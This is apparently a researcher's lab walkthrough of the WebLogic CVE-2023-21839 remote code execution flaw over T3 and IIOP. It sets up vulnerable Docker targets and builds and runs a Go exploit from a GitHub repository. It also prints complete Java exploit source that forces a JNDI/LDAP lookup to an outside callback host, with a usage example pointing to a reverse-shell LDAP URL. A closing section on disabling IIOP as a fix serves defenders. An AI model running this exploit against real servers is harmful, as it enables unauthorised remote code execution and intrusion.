WebLogic - CVE-2023-21839

Weblogic CVE-2023-21839 RCE over T3 and IIOP

Test Data

Version	Docker Image	Status
14.1.1.0	container-registry.oracle.com/middleware/weblogic:14.1.1.0	Vulnerable
12.2.1.4	container-registry.oracle.com/middleware/weblogic:12.2.1.4	Vulnerable
12.2.1.3	container-registry.oracle.com/middleware/weblogic:12.2.1.3	Vulnerable
12.2.1.3	vulhub/weblogic:12.2.1.3	Vulnerable
12.2.1.3	vulhub/weblogic:12.2.1.3-2018	Vulnerable
10.3.6.0	vulhub/weblogic:10.3.6.0-2017	Vulnerable

Golang - IIOP

IIOP is a TCP/IP protocol stack that implements the GIOP protocol, allowing CORBA objects to communicate and interact over the Internet.

RMI-IIOP is a way of implementing the Java remote method invocation (RMI) protocol, which extends the IIOP protocol with the functionality of remote calling Java objects through RMI.

1. No Java dependency is required, construct the protocol and directly RCE through socket

2. The NAT network problem of IIOP has been solved (Docker and public network targets can be tested)

3. Tested in Windows/Mac OS/Linux and WebLogic 12/14

4. Please use JDK 8u191 or below to start WebLogic and build JNDI Server by yourself

Exploiting VulnHub 12.2.1.3-2018

» docker pull vulhub/weblogic:12.2.1.3-2018
» docker run -d -p 7001:7001 -p 9002:9002 --name weblogic-vulnhub-12213-2018 --hostname weblogic-vulnhub-12213-2018 --ulimit nofile=1024:65536 -v $PWD:/u01/oracle/properties vulhub/weblogic:12.2.1.3-2018
» docker container ls                                                                                                             130 ↵
CONTAINER ID   IMAGE                           COMMAND                  CREATED             STATUS             PORTS                                                                                  NAMES
bc98f59ca86d   vulhub/weblogic:12.2.1.3-2018   "/u01/oracle/createA…"   About an hour ago   Up About an hour   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp   weblogic-vulnhub-12213-2018

» docker container logs weblogic-vulnhub-12213-2018
...
<Oct 7, 2024 7:28:10,575 AM GMT> <Notice> <JMX> <BEA-149512> <JMX Connector Server started at service:jmx:iiop://172.17.0.2:7001/jndi/weblogic.management.mbeanservers.runtime.> 
<Oct 7, 2024 7:28:10,722 AM GMT> <Notice> <JMX> <BEA-149512> <JMX Connector Server started at service:jmx:iiop://172.17.0.2:7001/jndi/weblogic.management.mbeanservers.domainruntime.> 
<Oct 7, 2024 7:28:10,728 AM GMT> <Notice> <JMX> <BEA-149512> <JMX Connector Server started at service:jmx:iiop://172.17.0.2:7001/jndi/weblogic.management.mbeanservers.edit.> 
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default" is now listening on 172.17.0.2:7001 for protocols iiop, t3, ldap, snmp, http.> 
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <WebLogicServer> <BEA-000331> <Started the WebLogic Server Administration Server "AdminServer" for domain "base_domain" running in development mode.> 
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default[1]" is now listening on 127.0.0.1:7001 for protocols iiop, t3, ldap, snmp, http.> 
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default" is now listening on 172.17.0.2:7001 for protocols iiop, t3, ldap, snmp, http.> 
<Oct 7, 2024 7:28:11,565 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default[1]" is now listening on 127.0.0.1:7001 for protocols iiop, t3, ldap, snmp, http.> 

» nmap -Pn -n -p7001 127.0.0.1 -sC
PORT     STATE SERVICE
7001/tcp open  afs3-callback
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 12.2.1.3)

Clone repo and build exploit:

apt :: ~ » git clone https://github.com/0xPThree/WebLogic
apt :: ~ » cd WebLogic/cve-2023-21839/cmd 
apt :: WebLogic/cve-2023-21839/cmd ‹main› » go build -o CVE-2023-21839
apt :: WebLogic/cve-2023-21839/cmd ‹main*› » ls -al
total 2964
drwxrwxr-x 2 void void    4096 Oct  7 11:07 .
drwxrwxr-x 3 void void    4096 Oct  7 11:07 ..
-rwxrwxr-x 1 void void 3009295 Oct  7 11:07 CVE-2023-21839
-rw-rw-r-- 1 void void   11475 Oct  7 11:07 main.go

Run the exploit:

Response in Burp Collaborator:

Burp Collaborator callback indicating a successful exploit attempt

Running the exploit against a patched target we get the following error:

Panic or other errors means that the target is not vulnerable. In this example it's because the IIOP function is disabled.

---

Java - T3

WebLogic's implementation of the RMI specification uses a proprietary protocol known as T3. You can think of T3 (and secure T3S) as a layer to expose/allow JNDI calls by clients.

T3 is the protocol used to transport information between WebLogic servers and other types of Java programs.

Exploiting from WebLogic 12.2.1.4 container

## Create base file (wlfullclient.jar)
[oracle@12214-weblogic lib]$ java -jar /u01/oracle/wlserver/modules/com.bea.core.jarbuilder.jar
Creating new jar file: wlfullclient.jar

## Upload payload to container
[oracle@12214-weblogic lib]$ curl -OL http://172.17.0.1/CVE_2023_21839.java
[oracle@12214-weblogic lib]$ curl -OL http://172.17.0.1/META-INF/MANIFEST.MF
[oracle@12214-weblogic lib]$ mkdir META-INF
[oracle@12214-weblogic lib]$ mv MANIFEST.MF META-INF/

## Create .class file
[oracle@12214-weblogic lib]$ mv wlfullclient.jar CVE_2023_21839.jar
[oracle@12214-weblogic lib]$ javac -cp CVE_2023_21839.jar CVE_2023_21839.java
[oracle@12214-weblogic lib]$ ls | grep CVE_2023_21839
CVE_2023_21839.class
CVE_2023_21839.jar
CVE_2023_21839.java

## Update base file with payload
[oracle@12214-weblogic lib]$ jar -uvf CVE_2023_21839.jar CVE_2023_21839.class
[oracle@12214-weblogic lib]$ jar -uvfm CVE_2023_21839.jar META-INF/MANIFEST.MF

## Execute exploit
[oracle@12214-weblogic lib]$ java -jar CVE_2023_21839.jar localhost:7001 ldap://zmpnx0cd2tzgorszf6mmfdt21t7kvkj9.oastify.com

## Java version
[oracle@12214-weblogic lib]$ java -version
java version "1.8.0_411"
Java(TM) SE Runtime Environment (build 1.8.0_411-b60)
Java HotSpot(TM) 64-Bit Server VM (build 25.411-b60, mixed mode)

Burp Collaborator callback from executing the exploit

// CVE_2023_21839.java
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import weblogic.deployment.jms.ForeignOpaqueReference;

public class CVE_2023_21839 {
  static String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
  
  static String HOW_TO_USE = "[*] e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";
  
  private static InitialContext getInitialContext(String url) throws NamingException {
    Hashtable<String, String> env = new Hashtable<>();
    env.put("java.naming.factory.initial", JNDI_FACTORY);
    env.put("java.naming.provider.url", url);
    return new InitialContext(env);
  }
  
  public static void main(String[] args) throws Exception {
    if (args.length < 2) {
      System.out.println(HOW_TO_USE);
      System.exit(0);
    } 
    String t3Url = args[0];
    String ldapUrl = args[1];
    InitialContext c = getInitialContext("t3://" + t3Url);
    Hashtable<String, String> env = new Hashtable<>();
    env.put("java.naming.factory.initial", "com.sun.jndi.rmi.registry.RegistryContextFactory");
    ForeignOpaqueReference f = new ForeignOpaqueReference();
    Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
    jndiEnvironment.setAccessible(true);
    jndiEnvironment.set(f, env);
    Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
    remoteJNDIName.setAccessible(true);
    remoteJNDIName.set(f, ldapUrl);
    String bindName = (new Random(System.currentTimeMillis())).nextLong() + "";
    try {
      c.bind(bindName, f);
      c.lookup(bindName);
    } catch (Exception exception) {}
  }
}

// META-INF/MANIFEST.MF
Manifest-Version: 1.0
Main-Class: CVE_2023_21839
Class-Path: CVE_2023_21839

Exploiting from from host

I am unable to use this exploit from my host system. I assume it's because Java version and/or dependencies.

[oracle@12214-weblogic lib]$ python -m SimpleHTTPServer 8080
» curl -OL http://172.17.0.6:8080/CVE_2023_21839.jar

» java -jar CVE_2023_21839.jar localhost:7009 ldap://zmpnx0cd2tzgorszf6mmfdt21t7kvkj9.oastify.com
...
Timed out while attempting to establish connection to :t3://localhost:7009 [Root exception is java.io.IOException: Timed out while attempting to establish connection to :t3://localhost:7009]

» java --version
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
openjdk 21.0.5-ea 2024-10-15
OpenJDK Runtime Environment (build 21.0.5-ea+8-Debian-1)
OpenJDK 64-Bit Server VM (build 21.0.5-ea+8-Debian-1, mixed mode, sharing)

---

Patch

The easiest way to patch this is by disabling IIOP in WebLogic Console.

Servers > Control > AdminServer > Protocols > IIOP > Uncheck "Enable IIOP"

Restart the WebLogic Server for the changes to take place.

[oracle@weblogic-vulnhub-12213-2018 bin]$ ./stopWebLogic.sh
[oracle@weblogic-vulnhub-12213-2018 bin]$ ./startWebLogic.sh 

Running the exploit we now get the following error:

Reading the logs we can see it is "because the incoming protocol iiop is not enabled", and we've successfully eliminated the attack vector.

» docker container logs weblogic-vulnhub-12213-2018
...
<Oct 7, 2024 8:51:07,332 AM GMT> <Warning> <Socket> <BEA-000443> <The connection attempt was rejected because the incoming protocol iiop is not enabled on channel Default[iiop].>